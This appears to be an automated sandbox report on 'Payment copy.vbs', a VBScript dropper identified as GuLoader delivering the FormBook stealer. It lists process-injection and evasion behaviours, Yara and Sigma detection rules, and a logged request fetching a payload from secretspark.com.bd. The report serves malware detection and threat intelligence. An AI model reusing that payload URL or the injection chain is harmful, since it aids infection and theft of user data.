Edit tour

Windows Analysis Report
Payment copy.vbs

Overview

General Information

Sample name:	Payment copy.vbs
Analysis ID:	1519254
MD5:	237ab08466bfa23450bb6266af82667f
SHA1:	a82af4e2d1367d941bf7576a83219dc4ef0b6f99
SHA256:	24843276944661cf3b13a9297843687f6b6fa1111d51bca9d73c45fa35bc4c7a
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64native

wscript.exe (PID: 4928 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

temp_executable.exe (PID: 3376 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 4648A0278BD003C324FCD7E7779DCF99)

temp_executable.exe (PID: 560 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 4648A0278BD003C324FCD7E7779DCF99)

RAVCpl64.exe (PID: 7624 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)

cmdkey.exe (PID: 2620 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)

explorer.exe (PID: 5060 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.13293637281.00000000035AB000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5060, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs", ProcessId: 4928, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5060, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs", ProcessId: 4928, ProcessName: wscript.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:30:11.363135+0200	2803270	2	Potentially Bad Traffic	192.168.11.20	49756	170.249.236.53	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: unknown

HTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49756 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: temp_executable.exe, cmdkey.exe

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00402645 FindFirstFileA,	1_2_00402645
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00405451
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00405E95 FindFirstFileA,FindClose,	1_2_00405E95
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00402645 FindFirstFileA,	2_2_00402645
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_00405451
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00405E95 FindFirstFileA,FindClose,	2_2_00405E95

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 4x nop then mov ebx, 00000004h	2_2_335F04E8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4x nop then mov ebx, 00000004h	3_2_05C69D58
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_02A204E8

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49756 -> 170.249.236.53:443

Source: global traffic

HTTP traffic detected: GET /sCvgayhFHxN196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: secretspark.com.bdCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /sCvgayhFHxN196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: secretspark.com.bdCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: secretspark.com.bd

Source: temp_executable.exe

String found in binary or memory: http://nsis.sf.net/NSIS_Error

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown

HTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49756 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_00404FBA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00404FBA

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339434E0 NtCreateMutant,LdrInitializeThunk,	2_2_339434E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_33942B90
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942BC0 NtQueryInformationToken,LdrInitializeThunk,	2_2_33942BC0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942EB0 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_33942EB0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_33942D10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33944260 NtSetContextThread,	2_2_33944260
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33944570 NtSuspendThread,	2_2_33944570
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942B80 NtCreateKey,	2_2_33942B80
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942BE0 NtQueryVirtualMemory,	2_2_33942BE0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942B10 NtAllocateVirtualMemory,	2_2_33942B10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942B00 NtQueryValueKey,	2_2_33942B00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942B20 NtQueryInformationProcess,	2_2_33942B20
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942A80 NtClose,	2_2_33942A80
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942AA0 NtQueryInformationFile,	2_2_33942AA0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942AC0 NtEnumerateValueKey,	2_2_33942AC0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942A10 NtWriteFile,	2_2_33942A10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339429D0 NtWaitForSingleObject,	2_2_339429D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339429F0 NtReadFile,	2_2_339429F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339438D0 NtGetContextThread,	2_2_339438D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942FB0 NtSetValueKey,	2_2_33942FB0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942F00 NtCreateFile,	2_2_33942F00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942F30 NtOpenDirectoryObject,	2_2_33942F30
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942E80 NtCreateProcessEx,	2_2_33942E80
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942ED0 NtResumeThread,	2_2_33942ED0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942EC0 NtQuerySection,	2_2_33942EC0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942E00 NtQueueApcThread,	2_2_33942E00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942E50 NtCreateSection,	2_2_33942E50
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942DA0 NtReadVirtualMemory,	2_2_33942DA0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942DC0 NtAdjustPrivilegesToken,	2_2_33942DC0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942D50 NtWriteVirtualMemory,	2_2_33942D50
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33943C90 NtOpenThread,	2_2_33943C90
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942CD0 NtEnumerateKey,	2_2_33942CD0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942CF0 NtDelayExecution,	2_2_33942CF0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942C10 NtOpenProcess,	2_2_33942C10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33943C30 NtOpenProcessToken,	2_2_33943C30
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942C30 NtMapViewOfSection,	2_2_33942C30
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942C20 NtSetInformationFile,	2_2_33942C20
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942C50 NtUnmapViewOfSection,	2_2_33942C50
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6D928 SleepEx,NtResumeThread,	3_2_05C6D928
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C6D790 SleepEx,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_05C6D790
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C334E0 NtCreateMutant,LdrInitializeThunk,	4_2_02C334E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32A80 NtClose,LdrInitializeThunk,	4_2_02C32A80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_02C32BC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32B80 NtCreateKey,LdrInitializeThunk,	4_2_02C32B80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_02C32B90
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32B00 NtQueryValueKey,LdrInitializeThunk,	4_2_02C32B00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32B10 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_02C32B10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32E50 NtCreateSection,LdrInitializeThunk,	4_2_02C32E50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32CF0 NtDelayExecution,LdrInitializeThunk,	4_2_02C32CF0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32C30 NtMapViewOfSection,LdrInitializeThunk,	4_2_02C32C30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_02C32D10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C34260 NtSetContextThread,	4_2_02C34260
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C34570 NtSuspendThread,	4_2_02C34570
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32AC0 NtEnumerateValueKey,	4_2_02C32AC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32AA0 NtQueryInformationFile,	4_2_02C32AA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32A10 NtWriteFile,	4_2_02C32A10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32BE0 NtQueryVirtualMemory,	4_2_02C32BE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32B20 NtQueryInformationProcess,	4_2_02C32B20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C338D0 NtGetContextThread,	4_2_02C338D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C329D0 NtWaitForSingleObject,	4_2_02C329D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C329F0 NtReadFile,	4_2_02C329F0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32EC0 NtQuerySection,	4_2_02C32EC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32ED0 NtResumeThread,	4_2_02C32ED0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32E80 NtCreateProcessEx,	4_2_02C32E80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32EB0 NtProtectVirtualMemory,	4_2_02C32EB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32E00 NtQueueApcThread,	4_2_02C32E00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32FB0 NtSetValueKey,	4_2_02C32FB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32F00 NtCreateFile,	4_2_02C32F00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32F30 NtOpenDirectoryObject,	4_2_02C32F30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32CD0 NtEnumerateKey,	4_2_02C32CD0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C33C90 NtOpenThread,	4_2_02C33C90
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32C50 NtUnmapViewOfSection,	4_2_02C32C50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32C10 NtOpenProcess,	4_2_02C32C10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32C20 NtSetInformationFile,	4_2_02C32C20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C33C30 NtOpenProcessToken,	4_2_02C33C30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32DC0 NtAdjustPrivilegesToken,	4_2_02C32DC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32DA0 NtReadVirtualMemory,	4_2_02C32DA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C32D50 NtWriteVirtualMemory,	4_2_02C32D50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A2F0AD NtQueryInformationProcess,	4_2_02A2F0AD
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A339A8 NtSuspendThread,	4_2_02A339A8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A33698 NtSetContextThread,	4_2_02A33698
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A33FC8 NtQueueApcThread,	4_2_02A33FC8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A33CB8 NtResumeThread,	4_2_02A33CB8

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		1_2_004030E2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		2_2_004030E2

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_004047F9	1_2_004047F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_00406A93	1_2_00406A93
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_004062BC	1_2_004062BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_004047F9	2_2_004047F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00406A93	2_2_00406A93
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_004062BC	2_2_004062BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901380	2_2_33901380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391E310	2_2_3391E310
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CF330	2_2_339CF330
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FD2EC	2_2_338FD2EC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339151C0	2_2_339151C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D010E	2_2_339D010E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AD130	2_2_339AD130
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3395717A	2_2_3395717A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339000A0	2_2_339000A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391B0D0	2_2_3391B0D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C70F1	2_2_339C70F1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BE076	2_2_339BE076
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C6757	2_2_339C6757
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33912760	2_2_33912760
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391A760	2_2_3391A760
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910680	2_2_33910680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CA6C0	2_2_339CA6C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CF6F6	2_2_339CF6F6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390C6E0	2_2_3390C6E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339836EC	2_2_339836EC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392C600	2_2_3392C600
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AD62C	2_2_339AD62C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BD646	2_2_339BD646
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33934670	2_2_33934670
